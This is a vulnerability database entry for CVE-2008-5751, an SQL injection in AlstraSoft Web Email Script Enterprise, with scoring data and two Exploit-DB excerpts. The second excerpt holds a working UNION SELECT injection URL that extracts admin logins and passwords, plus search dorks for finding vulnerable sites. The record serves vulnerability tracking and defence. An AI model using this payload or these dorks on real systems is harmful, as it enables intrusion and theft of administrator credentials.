CVE-2008-5751
Published 2008-12-30
Priority P341 · high · 7.5 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.97% (57.7th percentile)
SQL injection vulnerability in index.php in AlstraSoft Web Email Script Enterprise (ESE) allows remote attackers to execute arbitrary SQL commands via the id parameter in a directory action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alstrasoft | web_email_script_enterprise | — | — |
No detection rules found.
Exploit-DB
Alstrasoft e-Friends 4.96 - Multiple Vulnerabilities
exploitdb·2010-10-27
---
AlstraSoft E-Friends 4.96 Multiple Remote Vulnerabilities
Name: AlstraSoft E-Friends
Vendor: http://www.alstrasoft.com
Versions Affected: 4.96
Author: Salvatore Fresta aka Drosophila
Website: http://www.salvatorefresta.net
Contact: salvatorefresta [at] gmail [dot] com
Date: 2010-10-27
X. INDEX
I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
I. ABOUT THE APPLICATION
AlstraSoft E-Friends is an online social networking
software that allows you to start your own site just like
Friendster and MySpace.
Other versions could be vulnerable.
II. DESCRIPTION
Many parameters are not properly sanitised before being
used in SQL queries and from the PHP's upload functions.
III. ANALYSIS
Summary:
A) Arbitrary
Exploit-DB
Alstrasoft Web Email Script Enterprise - 'id' SQL Injection
exploitdb·2008-12-28
---
--AlstraSoft Web Email Script Enterprise (id) Remote SQL Injection Vuln.
############################################
Yazar(Auth0r): Bgh7
Site: Http://ozelteam.com Turk Bılısım Guclerı
PsT: ByBgh7 [at] msn [d0t] c0m
############################################
--Script: http://www.alstrasoft.com/disposable-email-script.htm
--Dork: AlstraSoft Web "ESE"
--Dork2: AlstraSoft Web Email Script Enterprise
--Expl0it;
--http://web.xxx /Script/ index.php?Act=directory&joinstatus=awesewise&id=-1+union+select+1,2,3,concat_ws(0x3a,admin_login,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+from+partners_admin
#########
column_name
İd
Passwd
No writeups or analysis indexed.